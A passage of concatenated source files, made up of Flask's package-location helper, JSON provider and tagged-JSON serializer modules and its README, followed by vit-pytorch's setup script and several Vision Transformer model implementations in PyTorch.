search_location = root_spec.submodule_search_locations[0] return os.path.dirname(search_location) else: # package with __init__.py return os.path.dirname(os.path.dirname(root_spec.origin)) else: # module return os.path.dirname(root_spec.origin) # type: ignore[type-var, return-value] def find_package(import_name: str) -> tuple[str | None, str]: """Find the prefix that a package is installed under, and the path that it would be imported from. The prefix is the directory containing the standard directory hierarchy (lib, bin, etc.). If the package is not installed to the system (:attr:`sys.prefix`) or a virtualenv (``site-packages``), ``None`` is returned. The path is the entry in :attr:`sys.path` that contains the package for import. If the package is not installed, it's assumed that the package was imported from the current working directory. """ package_path = _find_package_path(import_name) py_prefix = os.path.abspath(sys.prefix) # installed to the system if _path_is_relative_to(pathlib.PurePath(package_path), py_prefix): return py_prefix, package_path site_parent, site_folder = os.path.split(package_path) # installed to a virtualenv if site_folder.lower() == "site-packages": parent, folder = os.path.split(site_parent) # Windows (prefix/lib/site-packages) if folder.lower() == "lib": return parent, package_path # Unix (prefix/lib/pythonX.Y/site-packages) if os.path.basename(parent).lower() == "lib": return os.path.dirname(parent), package_path # something else (prefix/site-packages) return site_parent, package_path # not installed return None, package_path File: src/flask/json/provider.py from __future__ import annotations import dataclasses import decimal import json import typing as t import uuid import weakref from datetime import date from werkzeug.http import http_date if t.TYPE_CHECKING: # pragma: no cover from werkzeug.sansio.response import Response from ..sansio.app import App class JSONProvider: """A standard set of JSON operations for an application. Subclasses of this can be used to customize JSON behavior or use different JSON libraries. To implement a provider for a specific library, subclass this base class and implement at least :meth:`dumps` and :meth:`loads`. All other methods have default implementations. To use a different provider, either subclass ``Flask`` and set :attr:`~flask.Flask.json_provider_class` to a provider class, or set :attr:`app.json <flask.Flask.json>` to an instance of the class. :param app: An application instance. This will be stored as a :class:`weakref.proxy` on the :attr:`_app` attribute. .. versionadded:: 2.2 """ def __init__(self, app: App) -> None: self._app: App = weakref.proxy(app) def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON. :param obj: The data to serialize. :param kwargs: May be passed to the underlying JSON library. """ raise NotImplementedError def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: """Serialize data as JSON and write to a file. :param obj: The data to serialize. :param fp: A file opened for writing text. Should use the UTF-8 encoding to be valid JSON. :param kwargs: May be passed to the underlying JSON library. """ fp.write(self.dumps(obj, **kwargs)) def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON. :param s: Text or UTF-8 bytes. :param kwargs: May be passed to the underlying JSON library. """ raise NotImplementedError def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: """Deserialize data as JSON read from a file. 
:param fp: A file opened for reading text or UTF-8 bytes. :param kwargs: May be passed to the underlying JSON library. """ return self.loads(fp.read(), **kwargs) def _prepare_response_obj( self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] ) -> t.Any: if args and kwargs: raise TypeError("app.json.response() takes either args or kwargs, not both") if not args and not kwargs: return None if len(args) == 1: return args[0] return args or kwargs def response(self, *args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with the ``application/json`` mimetype. The :func:`~flask.json.jsonify` function calls this method for the current application. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. """ obj = self._prepare_response_obj(args, kwargs) return self._app.response_class(self.dumps(obj), mimetype="application/json") def _default(o: t.Any) -> t.Any: if isinstance(o, date): return http_date(o) if isinstance(o, (decimal.Decimal, uuid.UUID)): return str(o) if dataclasses and dataclasses.is_dataclass(o): return dataclasses.asdict(o) # type: ignore[call-overload] if hasattr(o, "__html__"): return str(o.__html__()) raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable") class DefaultJSONProvider(JSONProvider): """Provide JSON operations using Python's built-in :mod:`json` library. Serializes the following additional data types: - :class:`datetime.datetime` and :class:`datetime.date` are serialized to :rfc:`822` strings. This is the same as the HTTP date format. - :class:`uuid.UUID` is serialized to a string. - :class:`dataclasses.dataclass` is passed to :func:`dataclasses.asdict`. - :class:`~markupsafe.Markup` (or any object with a ``__html__`` method) will call the ``__html__`` method to get a string. """ default: t.Callable[[t.Any], t.Any] = staticmethod(_default) # type: ignore[assignment] """Apply this function to any object that :meth:`json.dumps` does not know how to serialize. It should return a valid JSON type or raise a ``TypeError``. """ ensure_ascii = True """Replace non-ASCII characters with escape sequences. This may be more compatible with some clients, but can be disabled for better performance and size. """ sort_keys = True """Sort the keys in any serialized dicts. This may be useful for some caching situations, but can be disabled for better performance. When enabled, keys must all be strings, they are not converted before sorting. """ compact: bool | None = None """If ``True``, or ``None`` out of debug mode, the :meth:`response` output will not add indentation, newlines, or spaces. If ``False``, or ``None`` in debug mode, it will use a non-compact representation. """ mimetype = "application/json" """The mimetype set in :meth:`response`.""" def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON to a string. Keyword arguments are passed to :func:`json.dumps`. Sets some parameter defaults from the :attr:`default`, :attr:`ensure_ascii`, and :attr:`sort_keys` attributes. :param obj: The data to serialize. :param kwargs: Passed to :func:`json.dumps`. 
""" kwargs.setdefault("default", self.default) kwargs.setdefault("ensure_ascii", self.ensure_ascii) kwargs.setdefault("sort_keys", self.sort_keys) return json.dumps(obj, **kwargs) def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON from a string or bytes. :param s: Text or UTF-8 bytes. :param kwargs: Passed to :func:`json.loads`. """ return json.loads(s, **kwargs) def response(self, *args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with it. The response mimetype will be "application/json" and can be changed with :attr:`mimetype`. If :attr:`compact` is ``False`` or debug mode is enabled, the output will be formatted to be easier to read. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. """ obj = self._prepare_response_obj(args, kwargs) dump_args: dict[str, t.Any] = {} if (self.compact is None and self._app.debug) or self.compact is False: dump_args.setdefault("indent", 2) else: dump_args.setdefault("separators", (",", ":")) return self._app.response_class( f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype ) File: src/flask/json/__init__.py from __future__ import annotations import json as _json import typing as t from ..globals import current_app from .provider import _default if t.TYPE_CHECKING: # pragma: no cover from ..wrappers import Response def dumps(obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.dumps() <flask.json.provider.JSONProvider.dumps>` method, otherwise it will use :func:`json.dumps`. :param obj: The data to serialize. :param kwargs: Arguments passed to the ``dumps`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.dumps``, allowing an app to override the behavior. .. versionchanged:: 2.0.2 :class:`decimal.Decimal` is supported by converting to a string. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. .. versionchanged:: 1.0.3 ``app`` can be passed directly, rather than requiring an app context for configuration. """ if current_app: return current_app.json.dumps(obj, **kwargs) kwargs.setdefault("default", _default) return _json.dumps(obj, **kwargs) def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: """Serialize data as JSON and write to a file. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.dump() <flask.json.provider.JSONProvider.dump>` method, otherwise it will use :func:`json.dump`. :param obj: The data to serialize. :param fp: A file opened for writing text. Should use the UTF-8 encoding to be valid JSON. :param kwargs: Arguments passed to the ``dump`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.dump``, allowing an app to override the behavior. .. versionchanged:: 2.0 Writing to a binary file, and the ``encoding`` argument, will be removed in Flask 2.1. """ if current_app: current_app.json.dump(obj, fp, **kwargs) else: kwargs.setdefault("default", _default) _json.dump(obj, fp, **kwargs) def loads(s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON. 
If :data:`~flask.current_app` is available, it will use its :meth:`app.json.loads() <flask.json.provider.JSONProvider.loads>` method, otherwise it will use :func:`json.loads`. :param s: Text or UTF-8 bytes. :param kwargs: Arguments passed to the ``loads`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.loads``, allowing an app to override the behavior. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. The data must be a string or UTF-8 bytes. .. versionchanged:: 1.0.3 ``app`` can be passed directly, rather than requiring an app context for configuration. """ if current_app: return current_app.json.loads(s, **kwargs) return _json.loads(s, **kwargs) def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: """Deserialize data as JSON read from a file. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.load() <flask.json.provider.JSONProvider.load>` method, otherwise it will use :func:`json.load`. :param fp: A file opened for reading text or UTF-8 bytes. :param kwargs: Arguments passed to the ``load`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.load``, allowing an app to override the behavior. .. versionchanged:: 2.2 The ``app`` parameter will be removed in Flask 2.3. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. The file must be text mode, or binary mode with UTF-8 bytes. """ if current_app: return current_app.json.load(fp, **kwargs) return _json.load(fp, **kwargs) def jsonify(*args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with the ``application/json`` mimetype. A dict or list returned from a view will be converted to a JSON response automatically without needing to call this. This requires an active request or application context, and calls :meth:`app.json.response() <flask.json.provider.JSONProvider.response>`. In debug mode, the output is formatted with indentation to make it easier to read. This may also be controlled by the provider. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. .. versionchanged:: 2.2 Calls ``current_app.json.response``, allowing an app to override the behavior. .. versionchanged:: 2.0.2 :class:`decimal.Decimal` is supported by converting to a string. .. versionchanged:: 0.11 Added support for serializing top-level arrays. This was a security risk in ancient browsers. See :ref:`security-json`. .. versionadded:: 0.2 """ return current_app.json.response(*args, **kwargs) # type: ignore[return-value] File: src/flask/json/tag.py """ Tagged JSON ~~~~~~~~~~~ A compact representation for lossless serialization of non-standard JSON types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this to serialize the session data, but it may be useful in other places. It can be extended to support other types. .. autoclass:: TaggedJSONSerializer :members: .. autoclass:: JSONTag :members: Let's see an example that adds support for :class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so to handle this we will dump the items as a list of ``[key, value]`` pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to identify the type. 
The session serializer processes dicts first, so insert the new tag at the front of the order since ``OrderedDict`` must be processed before ``dict``. .. code-block:: python from flask.json.tag import JSONTag class TagOrderedDict(JSONTag): __slots__ = ('serializer',) key = ' od' def check(self, value): return isinstance(value, OrderedDict) def to_json(self, value): return [[k, self.serializer.tag(v)] for k, v in iteritems(value)] def to_python(self, value): return OrderedDict(value) app.session_interface.serializer.register(TagOrderedDict, index=0) """ from __future__ import annotations import typing as t from base64 import b64decode from base64 import b64encode from datetime import datetime from uuid import UUID from markupsafe import Markup from werkzeug.http import http_date from werkzeug.http import parse_date from ..json import dumps from ..json import loads class JSONTag: """Base class for defining type tags for :class:`TaggedJSONSerializer`.""" __slots__ = ("serializer",) #: The tag to mark the serialized object with. If empty, this tag is #: only used as an intermediate step during tagging. key: str = "" def __init__(self, serializer: TaggedJSONSerializer) -> None: """Create a tagger for the given serializer.""" self.serializer = serializer def check(self, value: t.Any) -> bool: """Check if the given value should be tagged by this tag.""" raise NotImplementedError def to_json(self, value: t.Any) -> t.Any: """Convert the Python object to an object that is a valid JSON type. The tag will be added later.""" raise NotImplementedError def to_python(self, value: t.Any) -> t.Any: """Convert the JSON representation back to the correct type. The tag will already be removed.""" raise NotImplementedError def tag(self, value: t.Any) -> dict[str, t.Any]: """Convert the value to a valid JSON type and add the tag structure around it.""" return {self.key: self.to_json(value)} class TagDict(JSONTag): """Tag for 1-item dicts whose only key matches a registered tag. Internally, the dict key is suffixed with `__`, and the suffix is removed when deserializing. """ __slots__ = () key = " di" def check(self, value: t.Any) -> bool: return ( isinstance(value, dict) and len(value) == 1 and next(iter(value)) in self.serializer.tags ) def to_json(self, value: t.Any) -> t.Any: key = next(iter(value)) return {f"{key}__": self.serializer.tag(value[key])} def to_python(self, value: t.Any) -> t.Any: key = next(iter(value)) return {key[:-2]: value[key]} class PassDict(JSONTag): __slots__ = () def check(self, value: t.Any) -> bool: return isinstance(value, dict) def to_json(self, value: t.Any) -> t.Any: # JSON objects may only have string keys, so don't bother tagging the # key here. 
return {k: self.serializer.tag(v) for k, v in value.items()} tag = to_json class TagTuple(JSONTag): __slots__ = () key = " t" def check(self, value: t.Any) -> bool: return isinstance(value, tuple) def to_json(self, value: t.Any) -> t.Any: return [self.serializer.tag(item) for item in value] def to_python(self, value: t.Any) -> t.Any: return tuple(value) class PassList(JSONTag): __slots__ = () def check(self, value: t.Any) -> bool: return isinstance(value, list) def to_json(self, value: t.Any) -> t.Any: return [self.serializer.tag(item) for item in value] tag = to_json class TagBytes(JSONTag): __slots__ = () key = " b" def check(self, value: t.Any) -> bool: return isinstance(value, bytes) def to_json(self, value: t.Any) -> t.Any: return b64encode(value).decode("ascii") def to_python(self, value: t.Any) -> t.Any: return b64decode(value) class TagMarkup(JSONTag): """Serialize anything matching the :class:`~markupsafe.Markup` API by having a ``__html__`` method to the result of that method. Always deserializes to an instance of :class:`~markupsafe.Markup`.""" __slots__ = () key = " m" def check(self, value: t.Any) -> bool: return callable(getattr(value, "__html__", None)) def to_json(self, value: t.Any) -> t.Any: return str(value.__html__()) def to_python(self, value: t.Any) -> t.Any: return Markup(value) class TagUUID(JSONTag): __slots__ = () key = " u" def check(self, value: t.Any) -> bool: return isinstance(value, UUID) def to_json(self, value: t.Any) -> t.Any: return value.hex def to_python(self, value: t.Any) -> t.Any: return UUID(value) class TagDateTime(JSONTag): __slots__ = () key = " d" def check(self, value: t.Any) -> bool: return isinstance(value, datetime) def to_json(self, value: t.Any) -> t.Any: return http_date(value) def to_python(self, value: t.Any) -> t.Any: return parse_date(value) class TaggedJSONSerializer: """Serializer that uses a tag system to compactly represent objects that are not JSON types. Passed as the intermediate serializer to :class:`itsdangerous.Serializer`. The following extra types are supported: * :class:`dict` * :class:`tuple` * :class:`bytes` * :class:`~markupsafe.Markup` * :class:`~uuid.UUID` * :class:`~datetime.datetime` """ __slots__ = ("tags", "order") #: Tag classes to bind when creating the serializer. Other tags can be #: added later using :meth:`~register`. default_tags = [ TagDict, PassDict, TagTuple, PassList, TagBytes, TagMarkup, TagUUID, TagDateTime, ] def __init__(self) -> None: self.tags: dict[str, JSONTag] = {} self.order: list[JSONTag] = [] for cls in self.default_tags: self.register(cls) def register( self, tag_class: type[JSONTag], force: bool = False, index: int | None = None, ) -> None: """Register a new tag with this serializer. :param tag_class: tag class to register. Will be instantiated with this serializer instance. :param force: overwrite an existing tag. If false (default), a :exc:`KeyError` is raised. :param index: index to insert the new tag in the tag order. Useful when the new tag is a special case of an existing tag. If ``None`` (default), the tag is appended to the end of the order. :raise KeyError: if the tag key is already registered and ``force`` is not true. 
""" tag = tag_class(self) key = tag.key if key: if not force and key in self.tags: raise KeyError(f"Tag '{key}' is already registered.") self.tags[key] = tag if index is None: self.order.append(tag) else: self.order.insert(index, tag) def tag(self, value: t.Any) -> t.Any: """Convert a value to a tagged representation if necessary.""" for tag in self.order: if tag.check(value): return tag.tag(value) return value def untag(self, value: dict[str, t.Any]) -> t.Any: """Convert a tagged representation back to the original type.""" if len(value) != 1: return value key = next(iter(value)) if key not in self.tags: return value return self.tags[key].to_python(value[key]) def _untag_scan(self, value: t.Any) -> t.Any: if isinstance(value, dict): # untag each item recursively value = {k: self._untag_scan(v) for k, v in value.items()} # untag the dict itself value = self.untag(value) elif isinstance(value, list): # untag each item recursively value = [self._untag_scan(item) for item in value] return value def dumps(self, value: t.Any) -> str: """Tag the value and dump it to a compact JSON string.""" return dumps(self.tag(value), separators=(",", ":")) def loads(self, value: str) -> t.Any: """Load data from a JSON string and deserialized any tagged objects.""" return self._untag_scan(loads(value))
# Flask

Flask is a lightweight [WSGI][] web application framework. It is designed to make getting started quick and easy, with the ability to scale up to complex applications. It began as a simple wrapper around [Werkzeug][] and [Jinja][], and has become one of the most popular Python web application frameworks.

Flask offers suggestions, but doesn't enforce any dependencies or project layout. It is up to the developer to choose the tools and libraries they want to use. There are many extensions provided by the community that make adding new functionality easy.

[WSGI]: https://wsgi.readthedocs.io/
[Werkzeug]: https://werkzeug.palletsprojects.com/
[Jinja]: https://jinja.palletsprojects.com/

## A Simple Example

```python
# save this as app.py
from flask import Flask

app = Flask(__name__)


@app.route("/")
def hello():
    return "Hello, World!"
```

```
$ flask run
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
```

## Donate

The Pallets organization develops and supports Flask and the libraries it uses. In order to grow the community of contributors and users, and allow the maintainers to devote more time to the projects, [please donate today][].

[please donate today]: https://palletsprojects.com/donate
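As a small follow-on to the simple example above, the JSON provider defined in `src/flask/json/provider.py` earlier in this listing can be swapped per application. A sketch assuming Flask 2.2 or newer; the `SortedCompactJSON` subclass and the `/status` routes are illustrative names, not part of Flask:

```python
# save this as app_json.py
from flask import Flask, jsonify
from flask.json.provider import DefaultJSONProvider


class SortedCompactJSON(DefaultJSONProvider):
    # Always emit compact output, even in debug mode (keys stay sorted via
    # the inherited sort_keys = True default).
    compact = True


app = Flask(__name__)
app.json = SortedCompactJSON(app)  # documented alternative to subclassing Flask


@app.route("/status")
def status():
    # A dict returned from a view is serialized via app.json.response().
    return {"ok": True, "version": 1}


@app.route("/status-explicit")
def status_explicit():
    # Equivalent, going through flask.json.jsonify().
    return jsonify(ok=True, version=1)
```

Run it the same way as the README example (`flask --app app_json run`) and both routes return `{"ok":true,"version":1}` with the `application/json` mimetype.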
vit-pytorch
fcb9501cdd9e056dd040915deb3e0a6378821843
File: setup.py from setuptools import setup, find_packages with open('README.md') as f: long_description = f.read() setup( name = 'vit-pytorch', packages = find_packages(exclude=['examples']), version = '1.7.12', license='MIT', description = 'Vision Transformer (ViT) - Pytorch', long_description=long_description, long_description_content_type = 'text/markdown', author = 'Phil Wang', author_email = '[email protected]', url = 'https://github.com/lucidrains/vit-pytorch', keywords = [ 'artificial intelligence', 'attention mechanism', 'image recognition' ], install_requires=[ 'einops>=0.7.0', 'torch>=1.10', 'torchvision' ], setup_requires=[ 'pytest-runner', ], tests_require=[ 'pytest', 'torch==2.4.0', 'torchvision==0.19.0' ], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.6', ], ) File: vit_pytorch/max_vit.py from functools import partial import torch from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class Residual(nn.Module): def __init__(self, dim, fn): super().__init__() self.fn = fn def forward(self, x): return self.fn(x) + x class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() inner_dim = int(dim * mult) self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, inner_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # MBConv class SqueezeExcitation(nn.Module): def __init__(self, dim, shrinkage_rate = 0.25): super().__init__() hidden_dim = int(dim * shrinkage_rate) self.gate = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(dim, hidden_dim, bias = False), nn.SiLU(), nn.Linear(hidden_dim, dim, bias = False), nn.Sigmoid(), Rearrange('b c -> b c 1 1') ) def forward(self, x): return x * self.gate(x) class MBConvResidual(nn.Module): def __init__(self, fn, dropout = 0.): super().__init__() self.fn = fn self.dropsample = Dropsample(dropout) def forward(self, x): out = self.fn(x) out = self.dropsample(out) return out + x class Dropsample(nn.Module): def __init__(self, prob = 0): super().__init__() self.prob = prob def forward(self, x): device = x.device if self.prob == 0. or (not self.training): return x keep_mask = torch.FloatTensor((x.shape[0], 1, 1, 1), device = device).uniform_() > self.prob return x * keep_mask / (1 - self.prob) def MBConv( dim_in, dim_out, *, downsample, expansion_rate = 4, shrinkage_rate = 0.25, dropout = 0. 
): hidden_dim = int(expansion_rate * dim_out) stride = 2 if downsample else 1 net = nn.Sequential( nn.Conv2d(dim_in, hidden_dim, 1), nn.BatchNorm2d(hidden_dim), nn.GELU(), nn.Conv2d(hidden_dim, hidden_dim, 3, stride = stride, padding = 1, groups = hidden_dim), nn.BatchNorm2d(hidden_dim), nn.GELU(), SqueezeExcitation(hidden_dim, shrinkage_rate = shrinkage_rate), nn.Conv2d(hidden_dim, dim_out, 1), nn.BatchNorm2d(dim_out) ) if dim_in == dim_out and not downsample: net = MBConvResidual(net, dropout = dropout) return net # attention related classes class Attention(nn.Module): def __init__( self, dim, dim_head = 32, dropout = 0., window_size = 7 ): super().__init__() assert (dim % dim_head) == 0, 'dimension should be divisible by dimension per head' self.heads = dim // dim_head self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, dim * 3, bias = False) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Linear(dim, dim, bias = False), nn.Dropout(dropout) ) # relative positional bias self.rel_pos_bias = nn.Embedding((2 * window_size - 1) ** 2, self.heads) pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = rearrange(grid, 'i ... -> i 1 ...') - rearrange(grid, 'j ... -> 1 j ...') rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): batch, height, width, window_height, window_width, _, device, h = *x.shape, x.device, self.heads x = self.norm(x) # flatten x = rearrange(x, 'b x y w1 w2 d -> (b x y) (w1 w2) d') # project for queries, keys, values q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) # scale q = q * self.scale # sim sim = einsum('b h i d, b h j d -> b h i j', q, k) # add positional bias bias = self.rel_pos_bias(self.rel_pos_indices) sim = sim + rearrange(bias, 'i j h -> h i j') # attention attn = self.attend(sim) # aggregate out = einsum('b h i j, b h j d -> b h i d', attn, v) # merge heads out = rearrange(out, 'b h (w1 w2) d -> b w1 w2 (h d)', w1 = window_height, w2 = window_width) # combine heads out out = self.to_out(out) return rearrange(out, '(b x y) ... 
-> b x y ...', x = height, y = width) class MaxViT(nn.Module): def __init__( self, *, num_classes, dim, depth, dim_head = 32, dim_conv_stem = None, window_size = 7, mbconv_expansion_rate = 4, mbconv_shrinkage_rate = 0.25, dropout = 0.1, channels = 3 ): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' # convolutional stem dim_conv_stem = default(dim_conv_stem, dim) self.conv_stem = nn.Sequential( nn.Conv2d(channels, dim_conv_stem, 3, stride = 2, padding = 1), nn.Conv2d(dim_conv_stem, dim_conv_stem, 3, padding = 1) ) # variables num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (dim_conv_stem, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) self.layers = nn.ModuleList([]) # shorthand for window size for efficient block - grid like attention w = window_size # iterate through stages for ind, ((layer_dim_in, layer_dim), layer_depth) in enumerate(zip(dim_pairs, depth)): for stage_ind in range(layer_depth): is_first = stage_ind == 0 stage_dim_in = layer_dim_in if is_first else layer_dim block = nn.Sequential( MBConv( stage_dim_in, layer_dim, downsample = is_first, expansion_rate = mbconv_expansion_rate, shrinkage_rate = mbconv_shrinkage_rate ), Rearrange('b d (x w1) (y w2) -> b x y w1 w2 d', w1 = w, w2 = w), # block-like attention Residual(layer_dim, Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = w)), Residual(layer_dim, FeedForward(dim = layer_dim, dropout = dropout)), Rearrange('b x y w1 w2 d -> b d (x w1) (y w2)'), Rearrange('b d (w1 x) (w2 y) -> b x y w1 w2 d', w1 = w, w2 = w), # grid-like attention Residual(layer_dim, Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = w)), Residual(layer_dim, FeedForward(dim = layer_dim, dropout = dropout)), Rearrange('b x y w1 w2 d -> b d (w1 x) (w2 y)'), ) self.layers.append(block) # mlp head out self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): x = self.conv_stem(x) for stage in self.layers: x = stage(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_with_register_tokens.py """ Vision Transformers Need Registers https://arxiv.org/abs/2309.16588 """ import torch from torch import nn from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) 
self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, num_register_tokens = 4, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.register_tokens = nn.Parameter(torch.randn(num_register_tokens, dim)) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): batch, device = img.shape[0], img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) r = repeat(self.register_tokens, 'n d -> b n d', b = batch) x, ps = pack([x, r], 'b * d') x = self.transformer(x) x, _ = unpack(x, ps, 'b * d') x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/cross_vit.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d # feedforward class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None, kv_include_self = False): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = default(context, x) if kv_include_self: context = torch.cat((x, context), dim = 1) # cross attention requires CLS token includes itself as key 